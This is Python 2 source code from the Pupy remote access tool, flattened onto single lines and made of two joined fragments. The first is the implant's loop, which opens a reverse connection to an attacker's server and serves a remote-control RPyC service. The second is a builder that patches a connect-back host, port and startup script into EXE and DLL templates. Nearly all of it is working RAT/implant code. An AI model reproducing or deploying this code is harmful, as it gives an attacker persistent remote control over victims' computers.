def main(): global HOST, TRANSPORT if len(sys.argv)>1: parser = argparse.ArgumentParser(prog='pp.py', formatter_class=argparse.RawTextHelpFormatter, description="Starts a reverse connection to a Pupy server\nLast sources: https://github.com/n1nj4sec/pupy\nAuthor: @n1nj4sec ([email protected])\n") parser.add_argument('--transport', choices=[x for x in transports.iterkeys()], default=TRANSPORT, help="the transport to use ! (the server needs to be configured with the same transport) ") parser.add_argument('host', metavar='host:port', help='The address of the pupy server to connect to') args=parser.parse_args() HOST=args.host TRANSPORT=args.transport if "windows" in platform.system().lower(): try: import pupy config_file=pupy.get_pupy_config() exec config_file in globals() pupy.get_connect_back_host=(lambda: HOST) except ImportError: print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL" else: add_pseudo_pupy_module(HOST) attempt=0 while True: try: rhost,rport=None,None tab=HOST.rsplit(":",1) rhost=tab[0] if len(tab)==2: rport=int(tab[1]) else: rport=443 print "connecting to %s:%s using transport %s ..."%(rhost,rport, TRANSPORT) t=transports[TRANSPORT] client=t['client'](**t['client_kwargs']) s=client.connect(rhost, rport) stream = t['stream'](s, t['client_transport'], t['client_transport_kwargs']) conn=rpyc.utils.factory.connect_stream(stream, ReverseSlaveService, {}) while True: attempt=0 conn.serve() except KeyboardInterrupt: print "keyboard interrupt raised, restarting the connection" except SystemExit: print "SystemExit raised" break except EOFError: print "EOF received. exiting." break except Exception as e: print e time.sleep(get_next_wait(attempt)) attempt+=1
raise Exception("Error: multiple offsets to edit the config have been found") new_conf="HOST=\"%s:%s\"\nTRANSPORT=%s\n%s\n\x00\x00\x00\x00\x00\x00\x00\x00"%(host, port, repr(transport), offline_script) if len(new_conf)>4092: raise Exception("Error: config or offline script too long") binary=binary[0:offsets[0]]+new_conf+binary[offsets[0]+len(new_conf):] return binary if __name__=="__main__": parser = argparse.ArgumentParser(description='Process some integers.') parser.add_argument('-t', '--type', default='exe_x86', choices=['exe_x86','exe_x64','dll_x86','dll_x64'], help="(default: exe_x86)") parser.add_argument('-o', '--output', help="output path") parser.add_argument('-s', '--offline-script', help="offline python script to execute before starting the connection") parser.add_argument('-p', '--port', type=int, default=443, help="connect back ip (default:443)") parser.add_argument('--transport', choices=[x for x in transports.iterkeys()], default='tcp_ssl', help="the transport to use ! (the server needs to be configured with the same transport) ") parser.add_argument('host', nargs='*', help="connect back host") args=parser.parse_args() myhost=None if not args.host: myip=get_local_ip() if not myip: sys.exit("[-] couldn't find your local IP. You must precise an ip or a fqdn manually") myhost=myip else: myhost=args.host[0] if re.match("^.*:[0-9]+$", myhost):#auto fixing errors when entering host:port myhost, p=myhost.rsplit(':',1) if args.port==443: args.port=p script_code=""